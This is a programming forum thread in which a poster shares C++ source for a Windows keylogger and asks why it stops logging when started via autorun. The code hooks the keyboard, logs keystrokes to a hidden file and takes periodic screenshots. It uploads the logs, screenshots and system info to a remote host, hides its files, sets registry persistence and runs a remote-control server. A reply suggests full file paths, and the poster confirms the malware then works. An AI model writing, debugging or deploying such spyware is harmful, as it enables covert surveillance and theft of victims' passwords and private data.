CodeGuru Home VC++ / MFC / C++ .NET / C# Visual Basic VB Forums Developer.com
Results 1 to 4 of 4
  1. #1
    Join Date
    Jul 2013
    Posts
    3

    Keylogger problem

    I have the source code below,and it works perfect when i run it with double click.It captures keystrokes and makes screen shots for every 100 keystrokes + it can be controled remotely from another computer.
    The problem is that when it is added to registry by calling SetAutorunEnable("JACKAL",true) function,it starts and captures keystrokes and everything,but it doesn't write to "work.n6" file and it doesn't increment pressed and photo_contor values.And i dont know why! Please help! I know that something is wrong in KeyboardEvent or JACKAL but i dont know what.Everything else works just fine!


    #include "NZT.h"

    LRESULT WINAPI KeyboardEvent (int nCode, WPARAM wParam, LPARAM lParam)
    {
    f = fopen("work.n6","a+");
    wchar_t photo_name[MAX_PATH];
    char * use;
    LPWSTR convert;

    if ((nCode == HC_ACTION) && ((wParam == WM_SYSKEYDOWN) || (wParam == WM_KEYDOWN)))
    {
    static int pressed = 0;
    static int photo_contor = 0;
    f = fopen("work.n6","a+");
    KBDLLHOOKSTRUCT hooked_key = *((KBDLLHOOKSTRUCT*)lParam);
    DWORD dwMsg = 1;
    dwMsg += hooked_key.scanCode << 0x10;
    dwMsg += hooked_key.flags << 0x18;
    char lpszKeyName[0x400] = {0};
    lpszKeyName[0] = '[';

    int i = GetKeyNameText(dwMsg, (lpszKeyName + 1),0xFF) + 1;
    int key = hooked_key.vkCode;
    lpszKeyName[i] = ']';
    //Gamma Border
    if (key >= 'A' && key <= 'Z')
    {
    if (GetAsyncKeyState(VK_SHIFT)>= 0) key += 0x20;
    if (f!=NULL)
    fprintf(f,"%c", key);
    pressed += 1;
    }
    else
    {
    if (f != NULL)
    fprintf(f,"%s", lpszKeyName);
    pressed += 1;
    }

    hide_file("work.n6");
    hide_file("data.n6");

    if (pressed > 100 /*&& connection_possible*/)
    {
    fclose(f);
    uploadFile("work.n6","work.txt");
    _itow(photo_contor,photo_name,0xA);
    convert = wcscat(photo_name,L".jpeg");
    ScreenShot(convert,50);
    use = wide_to_utf8(convert);
    uploadFile(use,use);
    hide_file(use);

    if (photo_contor > 0)
    {
    _itow(photo_contor - 1,photo_name,0xA);
    convert = wcscat(photo_name,L".jpeg");
    DeleteFile(wide_to_utf8(convert));
    }
    pressed = 0;
    photo_contor ++;
    }
    fclose(f);
    }
    return CallNextHookEx(hKeyboardHook,nCode,wParam,lParam);
    }

    DWORD WINAPI JACKAL(LPVOID lpParm)
    {
    HINSTANCE hins;
    hins = GetModuleHandle(NULL);
    hKeyboardHook = SetWindowsHookEx ( WH_KEYBOARD_LL, (HOOKPROC) KeyboardEvent, hins, 0);

    MSG message;
    while (GetMessage(&message,NULL,0,0))
    {
    TranslateMessage( &message );
    DispatchMessage( &message );
    }

    UnhookWindowsHookEx(hKeyboardHook);
    return 0;
    }

    void wmain()
    {
    //stealth();
    //disable_firewall_UAC();
    auto_hide();
    SetAutorunEnable("JACKAL",true);

    WSAStartup(0x0101,&wsdata);

    getComputerInfo();
    writeComputerInfo();
    uploadComputerInfo();

    tasks[0] = CreateThread( NULL, 0,
    (LPTHREAD_START_ROUTINE)createServer, NULL, 0, NULL);
    tasks[1] = CreateThread( NULL, 0,
    (LPTHREAD_START_ROUTINE)JACKAL,NULL, 0, NULL);
    WaitForMultipleObjects(2, tasks, TRUE, INFINITE );

    WSACleanup();
    }

  2. #2
    VictorN's Avatar
    VictorN is offline Super Moderator Power Poster
    Join Date
    Jan 2003
    Location
    Hanover Germany
    Posts
    20,396

    Re: Keylogger problem

    You have to always use full path names rather than the local ones.
    Victor Nijegorodov

  3. #3
    Join Date
    Jul 2013
    Posts
    3

    Re: Keylogger problem

    Yes VictorN,i will take that into consideration.Thanks!

  4. #4
    Join Date
    Jul 2013
    Posts
    3

    Re: Keylogger problem

    Man you are a genius! It works thanks!
    I've replaced "work.n6" with the full filename path!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  





Click Here to Expand Forum to Full Width

Featured